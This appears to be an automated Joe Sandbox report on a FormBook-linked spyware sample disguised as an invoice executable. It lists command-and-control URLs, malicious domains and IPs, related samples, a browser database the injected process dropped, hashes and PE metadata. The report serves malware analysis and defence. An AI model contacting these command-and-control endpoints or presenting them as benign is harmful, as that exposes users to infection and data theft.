Source	Detection	Scanner	Label
http://www.hellogus.online/zrnp/?0dfXG=7dvP3oKbkgtActo7X+aB5i8XRavAV5IyhK19vEIy5gkELgbrMMXbl9nvhn4QjRtqjZGCw7A4nUi7FbRpiGaR0ExHc3mJnAhEafCzKEQKll8qfESIyEeBcE8V5iUbRPjYsxxHG3c=&U0W=7ROlj	0%	Avira URL Cloud	safe
http://www.tanjavanlaar.online/x6qo/	0%	Avira URL Cloud	safe
http://www.funddata-x.net/ktuy/?U0W=7ROlj&0dfXG=652DQ4wRyI2XhVz/YhB0IQPCvW3zE+wrC97TZKhiuJWrpaOjtOEU/fEJ0zut8nj2vm3uuaJhtQEDGSF/YMgRQz9E7T0dRnILtzW899MV4oEvPyMvvne8hVkOXAeZd0jlejfVwHA=	0%	Avira URL Cloud	safe
http://www.wiretap.digital/lbm4/	0%	Avira URL Cloud	safe
http://www.nieuws-july202502.sbs/vt2q/?0dfXG=NeoW3ZpGNhFVpRE+iGe18olEV8dN0FIDCvpVAutU77D6mk6iXiXc50i5bVx+uujx/SS4gHQAhcY6fImMEntZJ64couIpYsJtCpfvEgcpegPN4ht4aXCPY1AcPZvlMYHCMmAE9mg=&U0W=7ROlj	0%	Avira URL Cloud	safe
http://www.impulsarnegocios.info/bpal/?0dfXG=VMgVOaCh3mm+GdPlwv+P/XKcyqoSqp/AEn6p1isqCLPz7ObQC9Sqz3hudnfRRQZjENudSaBoMynPI/uiESQeR0wcE+BMO0b1K91MeQYvtVLH9vcXww6dd1bPq3nzmSOiSfDHfUE=&U0W=7ROlj	0%	Avira URL Cloud	safe
http://www.tanjavanlaar.online/x6qo/?0dfXG=LYoYqqsXSyXZ912d02KeRxWxUajovPP+KCE++TS9h3rijU4gS1lBkAl2SxoHngebSXZzdlj5br48AWpKGxuZwHFzrTAaxdvQ/X7He5kEj4NwOXn+jWKWbQEmUjM4tYdd4DTDmwg=&U0W=7ROlj	0%	Avira URL Cloud	safe
http://www.kuaimaolife.shop/wlzg/?0dfXG=c08zQlMNeTS9mFjcPTIyFfA1amU1nGqngy7ufrhJTucKXTiOjnqlR7bZNhOZWme4Y5s9JAieBcHnX0Bnfm5WdfKnufcgj0lRy4Tut92jAo5YyVSLqem1aQwSKpkntqqW/GXfj2I=&U0W=7ROlj	0%	Avira URL Cloud	safe
http://www.hellogus.online/zrnp/	0%	Avira URL Cloud	safe
http://www.impulsarnegocios.info/bpal/	0%	Avira URL Cloud	safe
http://www.accupower.tech/bruv/	100%	Avira URL Cloud	malware
http://www.hellogus.online	0%	Avira URL Cloud	safe
http://www.funddata-x.net/ktuy/	0%	Avira URL Cloud	safe
http://www.kuaimaolife.shop/wlzg/	0%	Avira URL Cloud	safe
http://www.accupower.tech/bruv/?0dfXG=m8AssDc9uWk0x9GHCTrZnR9Y2jIcSn1GjYx2w9avnpMe4W6VVreO1nGOBjertTgGFNtTfqQ2X/AnqGB7Ol5o31E7begEaRgXS9U7KwBR2U2mwEb1+OLmP0VxkBeeDW6FuSeEkXI=&U0W=7ROlj	100%	Avira URL Cloud	malware
http://www.nieuws-july202502.sbs/vt2q/	0%	Avira URL Cloud	safe
http://www.wiretap.digital/lbm4/?0dfXG=b6KmuAKoHDfmH6wBa4Iuhs+4qAfci8KJxStQSrt0xRWxrI04LbR2sZmSZHliQZPsTEeCyhZmzit1d7xvCBPKA7cM2dH3/rnJzTWpKXRa2CCyGb+HtjdcybjYJ406KzLAcPDnEDo=&U0W=7ROlj	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
accupower.tech	217.160.0.158	true	true	unknown
funddata-x.net	3.33.130.190	true	true	unknown
wiretap.digital	3.33.130.190	true	true	unknown
www.tanjavanlaar.online	213.249.67.10	true	true	unknown
nieuws-july202502.sbs	162.0.229.222	true	true	unknown
www.iwhfa.fyi	168.206.11.225	true	true	unknown
impulsarnegocios.info	3.33.130.190	true	true	unknown
www.kuaimaolife.shop	92.118.228.160	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
www.hellogus.online	209.74.64.190	true	true	unknown
www.nieuws-july202502.sbs	unknown	unknown	true	unknown
www.wiretap.digital	unknown	unknown	true	unknown
www.impulsarnegocios.info	unknown	unknown	true	unknown
www.funddata-x.net	unknown	unknown	true	unknown
www.o30cf998d.cfd	unknown	unknown	true	unknown
www.accupower.tech	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.hellogus.online/zrnp/?0dfXG=7dvP3oKbkgtActo7X+aB5i8XRavAV5IyhK19vEIy5gkELgbrMMXbl9nvhn4QjRtqjZGCw7A4nUi7FbRpiGaR0ExHc3mJnAhEafCzKEQKll8qfESIyEeBcE8V5iUbRPjYsxxHG3c=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.wiretap.digital/lbm4/	true	Avira URL Cloud: safe	unknown
http://www.funddata-x.net/ktuy/?U0W=7ROlj&0dfXG=652DQ4wRyI2XhVz/YhB0IQPCvW3zE+wrC97TZKhiuJWrpaOjtOEU/fEJ0zut8nj2vm3uuaJhtQEDGSF/YMgRQz9E7T0dRnILtzW899MV4oEvPyMvvne8hVkOXAeZd0jlejfVwHA=	true	Avira URL Cloud: safe	unknown
http://www.tanjavanlaar.online/x6qo/	true	Avira URL Cloud: safe	unknown
http://www.tanjavanlaar.online/x6qo/?0dfXG=LYoYqqsXSyXZ912d02KeRxWxUajovPP+KCE++TS9h3rijU4gS1lBkAl2SxoHngebSXZzdlj5br48AWpKGxuZwHFzrTAaxdvQ/X7He5kEj4NwOXn+jWKWbQEmUjM4tYdd4DTDmwg=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.nieuws-july202502.sbs/vt2q/?0dfXG=NeoW3ZpGNhFVpRE+iGe18olEV8dN0FIDCvpVAutU77D6mk6iXiXc50i5bVx+uujx/SS4gHQAhcY6fImMEntZJ64couIpYsJtCpfvEgcpegPN4ht4aXCPY1AcPZvlMYHCMmAE9mg=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.impulsarnegocios.info/bpal/?0dfXG=VMgVOaCh3mm+GdPlwv+P/XKcyqoSqp/AEn6p1isqCLPz7ObQC9Sqz3hudnfRRQZjENudSaBoMynPI/uiESQeR0wcE+BMO0b1K91MeQYvtVLH9vcXww6dd1bPq3nzmSOiSfDHfUE=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.hellogus.online/zrnp/	true	Avira URL Cloud: safe	unknown
http://www.kuaimaolife.shop/wlzg/?0dfXG=c08zQlMNeTS9mFjcPTIyFfA1amU1nGqngy7ufrhJTucKXTiOjnqlR7bZNhOZWme4Y5s9JAieBcHnX0Bnfm5WdfKnufcgj0lRy4Tut92jAo5YyVSLqem1aQwSKpkntqqW/GXfj2I=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.impulsarnegocios.info/bpal/	true	Avira URL Cloud: safe	unknown
http://www.accupower.tech/bruv/	true	Avira URL Cloud: malware	unknown
http://www.kuaimaolife.shop/wlzg/	true	Avira URL Cloud: safe	unknown
http://www.accupower.tech/bruv/?0dfXG=m8AssDc9uWk0x9GHCTrZnR9Y2jIcSn1GjYx2w9avnpMe4W6VVreO1nGOBjertTgGFNtTfqQ2X/AnqGB7Ol5o31E7begEaRgXS9U7KwBR2U2mwEb1+OLmP0VxkBeeDW6FuSeEkXI=&U0W=7ROlj	true	Avira URL Cloud: malware	unknown
http://www.funddata-x.net/ktuy/	true	Avira URL Cloud: safe	unknown
http://www.nieuws-july202502.sbs/vt2q/	true	Avira URL Cloud: safe	unknown
http://www.wiretap.digital/lbm4/?0dfXG=b6KmuAKoHDfmH6wBa4Iuhs+4qAfci8KJxStQSrt0xRWxrI04LbR2sZmSZHliQZPsTEeCyhZmzit1d7xvCBPKA7cM2dH3/rnJzTWpKXRa2CCyGb+HtjdcybjYJ406KzLAcPDnEDo=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.hellogus.online	fXZvHKoWCzop.exe, 0000000E.00000002.4648426160.00000000008DF000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	cacls.exe, 0000000C.00000002.4653682841.0000000004326000.00000004.10000000.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4650779219.0000000002DD6000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://github.com/necolas/normalize.css	cacls.exe, 0000000C.00000002.4653682841.000000000496E000.00000004.10000000.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4650779219.000000000341E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
213.249.67.10	www.tanjavanlaar.online	Netherlands	42585	METAREGISTRARNL	true
168.206.11.225	www.iwhfa.fyi	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
217.160.0.158	accupower.tech	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
162.0.229.222	nieuws-july202502.sbs	Canada	22612	NAMECHEAP-NETUS	true
92.118.228.160	www.kuaimaolife.shop	Latvia	35913	DEDIPATH-LLCUS	true
209.74.64.190	www.hellogus.online	United States	31744	MULTIBAND-NEWHOPEUS	true
3.33.130.190	funddata-x.net	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562313
Start date and time:	2024-11-25 13:53:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FACTURA 24V70 VINS.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@11/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 98% Number of executed functions: 146 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com
Execution Graph export aborted for target fXZvHKoWCzop.exe, PID 5948 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: FACTURA 24V70 VINS.exe

Simulations

Behavior and APIs

Time	Type	Description
07:54:18	API Interceptor	2x Sleep call for process: FACTURA 24V70 VINS.exe modified
07:56:21	API Interceptor	4936765x Sleep call for process: cacls.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
213.249.67.10	ByuoedHi2e.exe	Get hash	malicious	FormBook	Browse	www.mrfrankiboy.live/m0kv/
	H1CYDJ8LQe.exe	Get hash	malicious	FormBook	Browse	www.onlineblikje.online/qmow/
	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	www.onlineblikje.online/w27a/
	QUOTE2342534.exe	Get hash	malicious	FormBook	Browse	www.onlineblikje.online/z0t0/
	PO#001498.exe	Get hash	malicious	FormBook	Browse	www.onlineblikje.online/wp9q/?74=Wcq5nto4Pys/VvLEf2lJ/6Zw/QsAH/mOKDhTh8E2UkIGdNowS/NkUBtnEOdEZ1QRI1rqIZGZ3d2iBtPWddII6c2xOxLt6j8Q/ledcZJmmPQke33bUPdbyjY=&jf=kjpL5
	PO59458.exe	Get hash	malicious	FormBook	Browse	www.onlineblikje.online/mgmi/
168.206.11.225	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	www.iwhfa.fyi/27xo/
217.160.0.158	09Iz0ja549.exe	Get hash	malicious	FormBook	Browse	www.accupower.tech/3otj/
	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	www.accupower.tech/0f4o/
	Invoice.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.accupower.tech/07mh/
	P030092024LANDWAY.exe	Get hash	malicious	FormBook	Browse	www.accupower.tech/ojw7/
	Pago_43442300000000000000000000024765753734.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	www.click2adventure.info/hjdr/?Mf=UXesK2&BvYcNJr=YERzJiU3jU/BHdT8ZF24smawmHE5OPz7p6fhlkzGezonIhVb8tbY4O67g/K2l6x/FOo14LdHGQULyGanvUL3VS7ddCkspurQbg==
	iuwxw7l3B8.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.click2adventure.info/hjdr/?dF=zeCQgMQZOsoc6&aytH=YERzJiU3jU/BHdT8ZF24smawmHE5OPz7p6fhlkzGezonIhVb8tbY4O67g/K2l6x/FOo14LdHGQULyGanvUL3VS7ddCkspurQbg==
	HSCANNER.exe	Get hash	malicious	FormBook	Browse	www.click2adventure.info/plpr/?KGTOte=6HjjPapzNlyl+Gt6MQMmiwqBNWKAUmnyODSZReAeg46d7D+E8C8JMKavgXuzjVlXwx0Kkk5iLV9gcsvARuflSAvddZRatOOAsg==&Hc_bN=n0heiU41GCacZ
	safe.exe	Get hash	malicious	FormBook	Browse	www.bellbusinessparks.co.uk/c02s/?SvWX6j0=BV4kQI2kXt2ydqVmZcwoDmydtjVxFyASZgzdfY1q9auS0khmZGAXmvtywEuCvb+c0M8M&j2Mdt=1bZDvzLxhL9d
	MRQUolkoK7.exe	Get hash	malicious	FormBook	Browse	www.metallitypiercing.com/8u3b/?9rwxC4Lh=6zaY9LZskK4jJaXoHdI65vhQ4LGlJqLZGem3/ggY5x7GyB9QARo0ysqnsHu6pFpWo2CksxKRUA==&o2=iN68aFPHs

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.iwhfa.fyi	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	168.206.11.225
www.kuaimaolife.shop	Request for 30 Downpayment.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	193.42.24.245
	r0000000NT_PDF.exe	Get hash	malicious	FormBook	Browse	193.42.24.245
	SMX-ACH0036173.vbs	Get hash	malicious	FormBook, GuLoader	Browse	193.42.24.245
	TNT Original Documents AWB 8013580.exe	Get hash	malicious	FormBook	Browse	38.12.33.141
	rInvoiceCM60916_xlx.exe	Get hash	malicious	FormBook	Browse	38.55.251.233
	z1SupplyInvoiceCM60916_Doc.exe	Get hash	malicious	FormBook	Browse	38.55.251.233
	SOA SIL TL382920.exe	Get hash	malicious	FormBook	Browse	38.55.251.233
	Narudzba ACH0036173.vbe	Get hash	malicious	FormBook, GuLoader	Browse	38.55.251.233
	Revised Invoice H000127896.exe	Get hash	malicious	FormBook	Browse	38.55.251.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
METAREGISTRARNL	https://sv-management.solarflevoland.nl/wix	Get hash	malicious	Unknown	Browse	213.249.67.25
	ByuoedHi2e.exe	Get hash	malicious	FormBook	Browse	213.249.67.10
	H1CYDJ8LQe.exe	Get hash	malicious	FormBook	Browse	213.249.67.10
	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	213.249.67.10
	QUOTE2342534.exe	Get hash	malicious	FormBook	Browse	213.249.67.10
	PO#001498.exe	Get hash	malicious	FormBook	Browse	213.249.67.10
	PO59458.exe	Get hash	malicious	FormBook	Browse	213.249.67.10
	https://pt.surveymonkey.com/tr/v1/te/sye1khVpXMoAOA1o9dS7KswyeoXWRMc0CsiALAVvL9R1AEKLpDw_2FQ_2BjGpzqh9gEIleg14i6r7hX4PBEN8h0srmKEUKwP1mLRZLbUUusCb9ijP9SUb3shd8eAxCFYZdX_2BMEbjAe9Z41yfltVavABteyxJzvgHPE3p8pCRndVvaQ4_3D	Get hash	malicious	Unknown	Browse	213.249.67.13
	SaLY22oLht.exe	Get hash	malicious	Unknown	Browse	213.249.66.9
	https://plsdworkiqs.com/	Get hash	malicious	Unknown	Browse	213.249.67.40
CLAYERLIMITED-AS-APClayerLimitedHK	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	160.121.30.69
	botx.mips.elf	Get hash	malicious	Mirai	Browse	164.89.28.56
	xd.ppc.elf	Get hash	malicious	Mirai	Browse	160.121.57.136
	yakuza.i586.elf	Get hash	malicious	Mirai	Browse	164.88.46.94
	sora.mips.elf	Get hash	malicious	Mirai	Browse	155.159.96.41
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	164.89.16.71
	D7R Image_capture 28082024 JPEG FILE.exe	Get hash	malicious	FormBook	Browse	155.159.138.201
	i486.elf	Get hash	malicious	Mirai	Browse	160.121.250.131
	debug.dbg.elf	Get hash	malicious	Gafgyt, Mirai	Browse	164.89.16.74
	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	168.206.11.225
ONEANDONE-ASBrauerstrasse48DE	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	217.160.0.200
	7jBzTH9FXQ.exe	Get hash	malicious	Unknown	Browse	82.165.72.122
	fACYdCvub8.exe	Get hash	malicious	Unknown	Browse	82.165.3.205
	7jBzTH9FXQ.exe	Get hash	malicious	Unknown	Browse	74.208.177.192
	fACYdCvub8.exe	Get hash	malicious	Unknown	Browse	217.160.104.190
	file.exe	Get hash	malicious	FormBook	Browse	74.208.236.156
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	77.68.64.45
	exe009.exe	Get hash	malicious	Emotet	Browse	74.208.173.91
	5674656777985-069688574654 pdf.exe	Get hash	malicious	FormBook	Browse	217.160.0.200
	ajbKFgQ0Fl.exe	Get hash	malicious	Unknown	Browse	82.165.206.196

Process:	C:\Users\user\Desktop\FACTURA 24V70 VINS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\n-T73hKo

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.714107902552086
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	FACTURA 24V70 VINS.exe
File size:	806'912 bytes
MD5:	6e3917643d8c875e3f45c265b82cca9d
SHA1:	09163656f409eade7b892bd1e7ec8f9cdf045715
SHA256:	ddca7740e832942313e7bd03a5670bc03cb09d8113433826e252666eeda046ab
SHA512:	1b0416258c83e96cc709fd213303ab0f205c88c7d8963340f496f104f44859d562cc01cd4cccd1ca6452ff4549f5b212e1f36314ee7c7389880dace252b16634
SSDEEP:	24576:2T7j4PHi0fR/49AQ9cIuf1vElqPvCpA3Rx:av4S/livWW5h
TLSH:	FF05D0D13B36771ADEA99A35D559DDB592F11A387000FAF25ADC3B87328E2019E0CF42
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g..............0..,..."......*K... ...`....@.. ....................................@................................

File Icon


Icon Hash:	0f31d4313ada253b

Static PE Info

General

Entrypoint:	0x4c4b2a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6720E9C9 [Tue Oct 29 13:57:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc4ad8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc6000	0x1f9c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc2b30	0xc2c00	8e5adf57b24df0050fca9a93b330d289	False	0.8777002767971759	data	7.719487487198971	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc6000	0x1f9c	0x2000	a858b5fe389ec03b93ca3293b4d8c7c4	False	0.858154296875	data	7.227776289217876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc8000	0xc	0x200	4d0fa79a02f67fdcb30852b0de1d074e	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc60c8	0x1b0d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9407942238267148
